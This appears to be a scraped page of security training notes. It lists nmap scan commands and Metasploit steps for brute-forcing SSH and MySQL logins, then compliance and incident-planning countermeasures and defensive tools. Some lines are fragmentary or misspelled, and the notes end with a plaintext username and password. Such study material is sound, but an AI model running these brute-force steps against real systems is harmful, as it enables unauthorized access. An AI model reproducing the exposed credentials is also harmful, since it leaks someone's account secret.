Professional Documents
Culture Documents
2
3
4
5
7. Operating Scan OS-Scan -> nmap -O (IP or Domain)
8. View Filtered and Open Port Scan -> nmap -sV (IP or Domain)
#namp -sU (IP or Domain) -p 161
SSH Bruteforce:
#msfconsole
#use auxiliary/scannser/ssh/ssh_login
#show options
#set RHOSTS 192.168.1.1
#set THREADS 1000
#set USERPASS_FILE /root/password.txt
#set STOP_ON_SUCCESS false
#run
MySQL Bruteforce:
#msfconsole
#use auxiliary/scannser/mysql/mysql_login
#show options
#set RHOSTS 192.168.1.1
#set THREADS 1000
#use exploit/
#show options
#set RHOSTS 192.168.1.1
#set THREADS 1000
#set USERPASS_FILE /root/password.txt
#set STOP_ON_SUCCESS false
#run
#ettercap -G
*SolarWinds - Network Bandwidth Analyzer
*Spacework
*Steganography:
-NTFS -> ADS method
-Steganogram
-Stegdetect
*Countermeasure:
1. Choose your Compliance Standard -> ISO27001, COBIT5, COSO, Sarbanes Oxley
2. P.D.C.A process
3. Due Care (Policy->1.Risk Assesment, 2.Risk Management, 3.Mitigation Startegy Procedure,
Guidline) & Due Dilligence (Technical)
=============================================================
========================================
1. Penetration Testing -> Black Box Testing
2. Vulnerability Assesment
3. Contigency Planning : a. IRP (mTD), b. DRP (Preventive measure), c. CCP (Insurance)
4. Audit & Monitoring
=============================================================
========================================
Network Tool:
1. pfSense
2. Snortby
3. tripware -> program untuk cek file setup/instalai asli atau sudah ada perubahan
4. MyDLP -> Aplikasi utk cek apa aja yg di copy-paste
user : fcch064@foresec.org
pass : Qwerty123$